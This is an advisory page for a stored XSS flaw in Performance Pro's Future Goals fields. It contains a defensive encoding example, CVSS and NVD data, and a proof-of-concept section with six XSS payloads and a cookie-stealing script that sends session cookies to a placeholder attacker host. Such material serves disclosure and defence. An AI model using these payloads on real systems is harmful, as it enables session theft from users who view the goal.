Security Vulnerability Report
CVE-2025-60933 CVSS 6.1 MEDIUM

Published: 2025-10-21 15:15:39
Last Modified: 2026-04-15 00:35:42

Description

Multiple stored cross-site scripting (XSS) vulnerabilities in the Future Goals function of HR Performance Solutions Performance Pro v3.19.17 allow attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Goal Name, Goal Notes, Action Step Name, Action Step Description, Note Name, and Goal Description parameters. Because the payload is saved with the goal, it runs in the browser of every user who later views that goal, not only the submitter's. The patched version is PP-Release-6.3.2.0.
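The CWE-79 pattern behind this CVE beside its fix, as an added example that is not code from Performance Pro or from the advisory: the six Future Goals fields concatenated raw into markup, and the same template with each field HTML-encoded at render time. Field names follow the advisory; the goal object shape, the markup and the helper names are assumptions made for illustration.

```javascript
// Added example; not code from Performance Pro or from the advisory. It shows the
// CWE-79 pattern behind CVE-2025-60933 (the six Future Goals fields concatenated
// into markup unencoded) beside the hardened form (HTML-encode each field at
// render time). Field names follow the advisory; the goal object, the markup and
// the helper names are assumptions made for illustration.

const GOAL_FIELDS = ['goalName', 'goalDescription', 'goalNotes',
                     'actionStepName', 'actionStepDescription', 'noteName'];

// Encode the characters that can open a tag or break out of a quoted attribute.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable rendering: every field is interpolated raw, so a stored <img onerror>
// or <svg onload> in any of them becomes live markup for each viewer of the goal.
function renderGoalUnsafe(goal) {
  return [
    `<h2>${goal.goalName}</h2>`,
    `<p>${goal.goalDescription}</p>`,
    `<p>${goal.goalNotes}</p>`,
    `<ul><li><b>${goal.actionStepName}</b>: ${goal.actionStepDescription}</li></ul>`,
    `<p>Note: ${goal.noteName}</p>`,
  ].join('\n');
}

// Hardened rendering: the same template, but each field is encoded first. The
// payload is still stored and displayed, just as inert text.
function renderGoalSafe(goal) {
  const encoded = Object.fromEntries(
    GOAL_FIELDS.map((f) => [f, escapeHtml(goal[f] ?? '')]));
  return renderGoalUnsafe(encoded);
}

// True if the rendered HTML still contains one of the element types used by the
// PoC payloads as a real tag (an encoded '&lt;img' does not match).
const ACTIVE_TAG = /<(script|img|svg|body|input|iframe)\b/i;
function hasActiveMarkup(html) {
  return ACTIVE_TAG.test(html);
}

// Constructed sample goal carrying the payload shapes from the PoC section.
const maliciousGoal = {
  goalName: "<script>alert('XSS-GoalName')</script>",
  goalDescription: '<iframe src="javascript:alert(1)"></iframe>',
  goalNotes: '<img src=x onerror="alert(document.cookie)">',
  actionStepName: '<svg/onload=alert(1)>',
  actionStepDescription: '<body onload="fetch(\'https://attacker.example.com/?c=\' + document.cookie)">',
  noteName: '<input onfocus=alert(1) autofocus>',
};

console.log('v3.19.17-style rendering executes payload:', hasActiveMarkup(renderGoalUnsafe(maliciousGoal)));
console.log('encoded rendering executes payload:       ', hasActiveMarkup(renderGoalSafe(maliciousGoal)));
```

The fix is a single encoding step applied uniformly to all six fields at the point where they enter HTML; a per-field allow-list is not needed for plain text fields like these, and encoding at render time (rather than at save time) keeps the stored data unchanged and protects every view of it.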

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Reading the vector: reachable over the network with low attack complexity, no privileges scored, user interaction required (a victim must view the stored goal), scope changed (the script runs in the viewer's browser, a different security authority from the vulnerable server), low confidentiality and integrity impact, no availability impact. This metric is marked as a Secondary source in the raw data below.

Configurations (Affected Products)

No CPE configuration data is published for this CVE; the affected versions below are taken from the description.

HR Performance Solutions Performance Pro v3.19.17 (affected)
HR Performance Solutions Performance Pro < PP-Release-6.3.2.0 (affected; PP-Release-6.3.2.0 is the patched version)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. Note that the usage steps require a valid login to store the payload, while the CVSS vector above scores PR:N. The endpoint path and parameter names in the submission snippet are the PoC author's and are not confirmed elsewhere on this page.

```html
<!-- CVE-2025-60933 PoC - Stored XSS in HR Performance Solutions Performance Pro v3.19.17
     Vulnerable parameters: Goal Name, Goal Notes, Action Step Name, Action Step Description,
     Note Name, Goal Description -->

<!-- Step 1: Goal Name. A bare <script> tag runs only if the server writes it into the
     page HTML; a script element inserted through innerHTML does not execute, so fall
     back to the event-handler payloads in steps 2-6 in that case. -->
<script>alert('XSS-GoalName-CVE-2025-60933');</script>

<!-- Step 2: Goal Notes. document.cookie does not include HttpOnly cookies. -->
<img src=x onerror="alert(document.cookie)">

<!-- Step 3: Action Step Name -->
<svg/onload=alert('XSS-ActionStep')>

<!-- Step 4: Action Step Description -->
<body onload="fetch('https://attacker.example.com/steal?c='+document.cookie)">

<!-- Step 5: Note Name -->
<input onfocus=alert('XSS-NoteName') autofocus>

<!-- Step 6: Goal Description -->
<iframe src="javascript:alert('XSS-GoalDescription')"></iframe>

<!-- Usage:
     1. Log in to Performance Pro v3.19.17 with valid credentials
     2. Navigate to the Future Goals function
     3. Create a new goal and paste one of the above payloads into the corresponding field
     4. Save the goal
     5. When any other user views the goal, the script executes in their browser -->
```

```javascript
// Cookie-stealing payload: sends the viewer's non-HttpOnly cookies and the page URL
// to an attacker-controlled host (attacker.example.com is a placeholder).
var payload = '<script>\n' +
  'var img = new Image();\n' +
  'img.src = "https://attacker.example.com/steal?session=" + document.cookie + "&url=" + window.location.href;\n' +
  '</script>';

// Submit via the fetch API from a logged-in session. The endpoint path and the
// parameter names below are the PoC author's; confirm them against the real
// Future Goals save request (e.g. in the browser's network tab) before use.
fetch('/future-goals/save', {
  method: 'POST',
  headers: {'Content-Type': 'application/x-www-form-urlencoded'},
  body: 'goalName=' + encodeURIComponent(payload) +
        '&goalNotes=test&actionStepName=test&actionStepDescription=test' +
        '&noteName=test&goalDescription=test'
});
```

References

https://docs.offsecguy.com/cve/hr-performance-solutions/vulnerability/reflected-xss-future-goals (the URL slug says "reflected", while the NVD description and the PoC describe a stored XSS)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-60933",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-21T15:15:39.447",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Multiple stored cross-site scripting (XSS) vulnerabilities in the Future Goals function of HR Performance Solutions Performance Pro v3.19.17 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Goal Name, Goal Notes, Action Step Name, Action Step Description, Note Name, and Goal Description parameters. The patched version is PP-Release-6.3.2.0."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-79"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://docs.offsecguy.com/cve/hr-performance-solutions/vulnerability/reflected-xss-future-goals",
        "source": "[email protected]"
      }
    ]
  }
}
```